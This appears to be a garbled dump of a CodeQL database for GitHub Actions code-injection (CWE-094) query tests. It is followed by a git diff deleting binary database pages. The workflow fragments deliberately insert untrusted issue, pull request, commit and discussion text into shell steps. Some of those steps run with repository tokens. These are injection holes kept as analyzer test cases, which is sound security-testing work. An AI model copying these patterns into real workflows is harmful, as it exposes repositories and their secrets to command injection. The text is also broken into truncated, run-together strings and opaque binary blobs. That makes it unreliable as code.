want to help us make Dynamo all that it can be."Hello ... issue! needs_more_info_commentneeds_m ... commentHowever, we need some more information in order for the Dynamo team to investigate any further.\n\n"Howeve ... Dynamoclose_issue_commentHowever, given that there has been no additional information added, this issue will be closed for now. Please reopen and provide additional information if you wish the Dynamo team to investigate further.\n\n"Howeve ... 
added, info_neededAdditional information:\n - Filling in of the provided Template (What did you do, What did you expect to see, What did you see instead, What packages or external references (if any) were used)\n - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\n - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\n - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase said errors message in the screenshot)\n - Reproducible steps on how to create the error in question."Additi ... ion:\\nspecific_infoCan you please fill in the following to the best of your ability:"Can yo ... ility:"templateISSUE_TEMPLATE.md"ISSUE_TEMPLATE.md"issue_labelneeds more infoacceptable_missing_infoaccepta ... ng_info1analysi ... definedISSUE_B ... .body}}${{env.ISSUE_BODY}}${{ steps.remove_quotations.outputs.replaced }}${{ ste ... aced }}ISSUE_B ... aced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV -Close issueenv.analysis_response == 'Empty'env.ana ... 'Empty'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments -curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} -name: Close issueLabel and comment issueLabel a ... t issue((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened'))((env.a ... 
ened'))curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels -curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments -name: L ... t issueUnlabel updated issueUnlabel ... d issueenv.analysis_response == 'Valid' && github.event.action == 'edited'env.ana ... edited'echo urldecode ${{env.issue_label}} -curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') -name: U ... d issueGreetingsenv.analysis_response == 'Valid' && github.event.action == 'opened'env.ana ... opened'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments -name: Greetingsif: nee ... 'Valid'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.ymlIssue Type Predicterissue_type_Predicterparsed_issue_bodyissue_json_stringis_wish_listCheckout Dynamo Reponame: C ... mo RepoRemove Quotesremove_quotes${{ github.event.issue.body }}${{ git ... body }}ISSUE_B ... body }}${{ env.ISSUE_BODY }}${{ env ... BODY }}name: Remove QuotesAnalyze Issue Body${{ steps.remove_quotes.outputs.replaced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV -name: A ... ue BodyClean Issue Bodyenv.analysis_response == 'Valid'env.ana ... 'Valid'ISSUE_BODY_PARSEDecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV -name: C ... ue BodyCreate Issue JSON StringCreate ... StringISSUE_NUMBER${{ github.event.issue.number }}${{ git ... mber }}${{ github.event.issue.title }}${{ git ... 
itle }}ISSUE_N ... mber }}echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV -name: C ... StringCheckout IssuesTypePredicter RepoCheckou ... er ReporepositoryDynamoDS/IssuesTypePredicterDynamoD ... edicterpathIssuesTypePredicterreposit ... edictername: C ... er RepoSetup dotnetactions/setup-dotnet@v4actions ... tnet@v4dotnet-version3.1.0'3.1.0'dotnet- ... '3.1.0'name: Setup dotnetBuild Issues Type PredicterBuild I ... edicterdotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release -cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . -name: B ... edicterRun Issues Type PredicterRun Iss ... edicterecho "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV -name: R ... edicterLabel issue as 'Wishlist'Label i ... shlist'env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1')env.ana ... ist:1')GH_TOKEN${{ secrets.DYNAMO_ISSUES_TOKEN }}${{ sec ... OKEN }}GH_TOKE ... OKEN }}gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} -name: L ... shlist'Label issue as 'NotMLEvaluated'Label i ... luated'env.analysis_response != 'Valid' || env.issue_json_string == ''env.ana ... g == ''gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} -name: L ... luated'- name: ... mo Reponame: I ... edicterissue_t ... dicter:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.ymlCherry pickingpushmaster- masterpush:cherry_pickdestination_branchinvalid'invalid'auto_branchauto-${{github.event.after}}'auto-$ ... fter}}'user_nameDynamo-Bot"Dynamo-Bot"destina ... 
nvalid'checkoutactions/checkout@v3name: checkoutfrabert/replace-string-action@v1.2frabert ... on@v1.2${{github.event.commits[0].message}}${{gith ... ssage}}ISSUE_B ... laced}}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV -env.destination_branch != 'invalid'env.des ... nvalid'Create PR to branchgit config user.name "${{env.user_name}}" -git fetch --all -git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} -git cherry-pick -x ${{github.event.after}} --strategy-option theirs -git push -u origin ${{env.auto_branch}} -hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" -GITHUB_TOKEN${{secrets.DYNAMOBOTTOKEN}}${{secr ... TOKEN}}pr_messageCherry-Pick from commit: ${{github.event.after}} - -### Cherry-picking: -[Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}}) - -### Pull request: -${{ env.ISSUE_BODY_PARSED }} -GITHUB_ ... TOKEN}}if: env ... nvalid'- name: checkoutcherry_pick:name: Cherry picking/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.ymldiscussionecho '${{ github.event.discussion.title }}'echo '${{ github.event.discussion.body }}'- run: ... tle }}'on: discussion/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.ymldiscussion_commenton: dis ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.ymlgollumecho '${{ github.event.pages[1].title }}'echo '${{ github.event.pages[11].title }}'echo '${{ github.event.pages[0].page_name }}'echo '$ ... ame }}'run: ec ... ame }}'echo '${{ github.event.pages[2222].page_name }}'echo '${{ toJSON(github.event.pages.*.title) }}'echo '$ ... le) }}'run: ec ... 
# safeon: gollum/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.ymlImage URL Processingcreated[created]types: [created]issue_comment:process-image-urlcontains(github.event.comment.body, 'https://github.com/github/release-assets/assets/')contain ... sets/')Checkoutname: CheckoutExtract and Clean Initial URLExtract ... ial URLextract-urlBODY${{ github.event.comment.body }}BODY: $ ... body }}echo "::set-output name=initial_url::$BODY" -name: E ... ial URLGet Redirected URL with DebuggingGet Red ... buggingcurlINITIAL_URL${{ steps.extract-url.outputs.initial_url }}${{ ste ... _url }}INITIAL ... _url }}echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT -name: G ... buggingTrim URL after PNGtrim-urlREDIRECTED_URL${{ steps.curl.outputs.redirected_url }}REDIREC ... _url }}echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" -name: T ... ter PNGUpdate Comment with New URLUpdate ... New URLNEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" -name: U ... New URL- name: Checkoutprocess-image-url:name: I ... cessing/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.ymljob1job_output${{ steps.step.outputs.value }}${{ ste ... alue }}job_out ... alue }}sourceRemove foo from changed filesRemove ... d filesstepmad9000/actions-find-and-replace-string@3mad9000 ... tring@3${{ steps.source.outputs.all_changed_files }}${{ ste ... iles }}findfoo'foo'replace''source: ... iles }}name: R ... d filesjob2${{ always() }}sinkecho ${{needs.job1.outputs.job_output}}echo ${ ... utput}}id: sink- id: sinkjob1:on: push/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yamlglobal_envtestglobal_ ... itle }}job_envjob_env ... itle }}echo '${{ env.global_env }}'echo '$ ... 
env }}'run: ec ... env }}'echo '${{ env.test }}'echo '$ ... est }}'run: ec ... est }}'echo '${{ env.job_env }}'echo '${{ env.step_env }}'step_envstep_en ... itle }}env:on: issues/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.ymlCodeQL Auto Language"CodeQL ... nguage"[ main ]branches: [ main ]schedulecron17 19 * * 6'17 19 * * 6'cron: '17 19 * * 6'- cron: ... * * 6'create-matrixmatrix${{ steps.set-matrix.outputs.all_changed_files }}matrix: ... iles }}set-matrix- name: ... d filesanalyze${{ needs.create-matrix.outputs.matrix != '[]' }}${{ nee ... '[]' }}Analyzeactionsreadcontentssecurity-eventswriteactions: readstrategyfail-fastfalselanguage${{ fromJSON(needs.create-matrix.outputs.matrix) }}${{ fro ... rix) }}languag ... rix) }}fail-fast: falseCheckout repositoryname: C ... ository${{ matrix.language }} -| run: | - name: ... ositoryneeds: create-matrixcreate-matrix:name: " ... nguage"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.ymlsimple1${{ github.event.head_commit.message }}${{ git ... sage }}source: ... sage }}id: source no-stepecho "test=foo" >> "$GITHUB_OUTPUT"echo "t ... OUTPUT"id: no-stepecho "echo ${{steps.no-step.outputs.foo}}" -- id: source simple1:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.ymlfoobarfoo'foobarfoo'source: 'foobarfoo'for file in ${{ steps.step.outputs.value }}; do - echo "$file was changed" -done -/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.ymlpull_request_reviewecho '${{ github.event.pull_request.title }}'echo '${{ github.event.pull_request.body }}'echo '${{ github.event.pull_request.head.label }}'echo '$ ... bel }}'run: ec ... 
bel }}'echo '${{ github.event.pull_request.head.repo.default_branch }}'echo '$ ... nch }}'run: ec ... nch }}'echo '${{ github.event.pull_request.head.repo.description }}'echo '$ ... ion }}'run: ec ... ion }}'echo '${{ github.event.pull_request.head.repo.homepage }}'echo '$ ... age }}'run: ec ... age }}'echo '${{ github.event.pull_request.head.ref }}'echo '$ ... ref }}'run: ec ... ref }}'echo '${{ github.event.review.body }}'on: pul ... _review/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.ymlpull_request_review_commentpull_re ... commenton: pul ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.ymlpull_request_targetrun: ec ... definedecho '${{ github.head_ref }}'- run: ... definedon: pul ... _target/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.ymlecho '${{ github.event.commits[11].message }}'echo '${{ github.event.commits[11].author.email }}'echo '$ ... ail }}'run: ec ... ail }}'echo '${{ github.event.commits[11].author.name }}'echo '${{ github.event.head_commit.message }}'echo '${{ github.event.head_commit.author.email }}'echo '${{ github.event.head_commit.author.name }}'echo '${{ github.event.head_commit.committer.email }}'echo '${{ github.event.head_commit.committer.name }}'echo '${{ github.event.commits[11].committer.email }}'echo '${{ github.event.commits[11].committer.name }}'- run: ... 
age }}'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.ymlsummaryid: summaryflowecho "${{steps.summary.outputs.value}}" -id: flow no-flowecho "${{steps.summary.outputs.foo}}" -id: no-flow- id: summary/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml[pull_r ... equest]for file in ${{ steps.source.outputs.all_changed_files_count }}; do - echo "$file was changed" -done -/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml${{ steps.step2.outputs.test }}${{ ste ... test }}job_out ... test }}step0id: step0 step1${{ steps.step0.outputs.value}}${{ ste ... value}}BODY: $ ... value}}shellpowershellWrite-Output "::set-output name=MSG::$ENV{BODY}" -id: step1step2MSG${{steps.step1.outputs.MSG}}${{step ... s.MSG}}MSG: ${ ... s.MSG}}echo "test=$MSG" >> "$GITHUB_OUTPUT"id: step2run: ec ... utput}}- run: ... 
utput}}/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.ymlworkflow_runworkflows[test]workflows: [test]workflow_run:echo '${{ github.event.workflow_run.display_title }}'echo '${{ github.event.workflow_run.head_commit.message }}'echo '${{ github.event.workflow_run.head_commit.author.email }}'echo '${{ github.event.workflow_run.head_commit.author.name }}'echo '${{ github.event.workflow_run.head_commit.committer.email }}'echo '${{ github.event.workflow_run.head_commit.committer.name }}'echo '${{ github.event.workflow_run.head_branch }}'echo '${{ github.event.workflow_run.head_repository.description }}'on:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1'test'descriptionbrandingiconcoloricon: 'test'inputsrequireddefaultdescription: testtest:runsusingcomposite"composite"using: "composite"name: 'test'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2Hello World'Hello World'Greet someone and record the time'Greet ... e time'who-to-greetWho to greet'Who to greet'trueWorld'World'descrip ... greet'who-to- ... f inputtimeThe time we greeted you'The ti ... ed you'descrip ... ed you'time: # id of outputdocker'docker'imageDockerfile'Dockerfile'args${{ inputs.who-to-greet }}${{ inp ... reet }}- ${{ i ... reet }}using: 'docker'name: 'Hello World'hSt¹>w \ No newline at end of file 
diff --git a/db/db-yaml/default/pools/1/buckets/info b/db/db-yaml/default/pools/1/buckets/info deleted file mode 100644 index 0111728636533e2c31d7b0489e64f46bcd4d6cf2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q diff --git a/db/db-yaml/default/pools/1/buckets/page-000000 b/db/db-yaml/default/pools/1/buckets/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/ids1/info b/db/db-yaml/default/pools/1/ids1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/indices1/info b/db/db-yaml/default/pools/1/indices1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/info b/db/db-yaml/default/pools/1/info deleted file mode 100644 index 9b4ec24220f77cd70a002420d93e390bfc4c1f7a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41 ccmZQz00U+q$+QN785kjAU>eL`E;&&F04bXS)Bpeg diff --git a/db/db-yaml/default/pools/1/metadata/info b/db/db-yaml/default/pools/1/metadata/info deleted file mode 100644 index 9cdb710dfd9490f67f5103cbab69eb12829f96b4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 
diff --git a/db/db-yaml/default/pools/1/metadata/page-000000 b/db/db-yaml/default/pools/1/metadata/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 
diff --git a/db/db-yaml/default/pools/1/pageDump/page-000000000 b/db/db-yaml/default/pools/1/pageDump/page-000000000 deleted file mode 100644 index 7bccaeb20c898fd660036bab54ae98c20280d0a3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U 
zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N 
z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly 
